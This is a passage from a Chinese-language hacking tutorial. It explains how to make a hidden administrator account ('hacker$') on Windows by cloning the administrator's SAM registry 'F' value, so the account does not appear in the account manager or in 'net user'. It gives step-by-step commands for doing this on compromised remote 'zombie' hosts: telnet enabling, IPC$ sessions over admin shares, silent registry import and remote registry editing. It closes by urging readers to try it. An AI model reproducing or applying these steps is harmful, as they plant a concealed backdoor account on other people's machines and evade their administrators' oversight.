下面将hacker$键、hacker$对应的项000003F1连同administrator所对应的项000001F4导出为hacker.reg、3EE.reg和1f4.reg,退出注册表编辑器。用记事本分别打开这几个导出的文档进行编辑,将终极用户对应的项000001F4下的键“F”的值复制,并覆盖hacker$对应的项000003EE下的键“F”的值,然后将hacker.reg和3EE.reg合并为hacker.reg。 接下来在命令行下执行net user hacker$ /del将用户hacker$删除,最后再将hacker.reg导入注册表即可。
现在,隐藏的终极用户hacker$已建好了。打开regedt32.exe,把HKEY_LOCAL_MACHINE/SAM/SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
注意:隐藏的终极用户建好后,就能在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是终极用户建立以后,就不能再改密码了,假如用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的终极用户了,而且不能删除。
三、命令行建立隐藏终极用户
首先通过使用OpenTelnet.exe工具来开启远程主机的TELNET服务,然后TELNET远程登陆得到一个shell,创建一个新的帐户,命令为:
net user hacker$ youkou /add,然后就来导出注册表项HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users,运行命令:
regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/,其中/e 是regedit.exe的参数,在HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users这个键的一定要以“/”结尾。
 |
断开TELNET连接,建立IPC会话:net use //192.XX.XX.2/ipc$ "123" /user:"administrator,然后将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy //192.XX.XX.2/D$/hacker.reg,用记事本编辑,将终极用户对应的项000001F4下的键“F”的值复制,并覆盖hacker$对应的项000003EE下的键“F”的值(hacker$对应的项在不同的机器而不同),编辑好后再上传:copy hacker.reg //192.XX.XX.2/D$/hacker1.reg 。
再TELNET到远程主机,使用命令net user hacker$ /del删除hacker$帐户,然后把hacker.reg导入,命令为:regedit.exe /s hacker.reg,其中参数/s表示以安静模式导入。这样就成功创建了一个隐藏的终极用户。
四、连接远程肉鸡注册表创建
更有一个比较简单方便的办法,就是通过控制台连同注册表编辑器“文档”菜单中的“连接网络注册表”功能来完成隐藏终极用户的创建。
通过“开始”菜单中的“运行”,输入MMC,回车后即打开了控制台,打开“文档”菜单中的“添加/删除管理单元”(快捷键CTRL M),在出现的对话框中点击“添加”按钮,在出现的“添加单独管理单元”对话框中的列表中选择“本地用户和组”。
 |
单击“添加”即弹出“选择目标机器”对话框,选中“另一台电脑”,在其后输入远程电脑的IP地址,点击“完成”。
 |
一路关闭返回至控制台窗口,我们就可对远程电脑进行组和用户的管理了,在右侧窗口空白处右击,在弹出的快捷选择“新用户”建立一帐户hacker$吧!
我们知道,regedit.exe、regedt32.exe都有连接网络注册表的功能,我们能够用regedt32.exe来为远程主机的注册表项配置权限,用regedit.exe来编辑远程注册表。导出相应注册项,然后进行编辑修改(同上面介绍相似)。
 |
现在在“控制台”中删除刚建立的帐户hacker$,然后关闭。然后在注册表编辑器中通过“文档”菜单中的“导入”功能将上面导出的文档导入即可。
假如远程主机没有开启远程注册表服务,请自行开启,因为您一开始就已拥有其管理员帐户密码。
五、需注意的几点事项
1、隐藏的终极用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。
2、隐藏的终极用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的终极用户就会暴露在帐户管理器中,而且不能删除。
3、如在本机上创建隐藏的终极用户时,最好用系统自带的备份工具先备份好注册表。
想不想在电脑上大显身手?自己动手试一试吧!
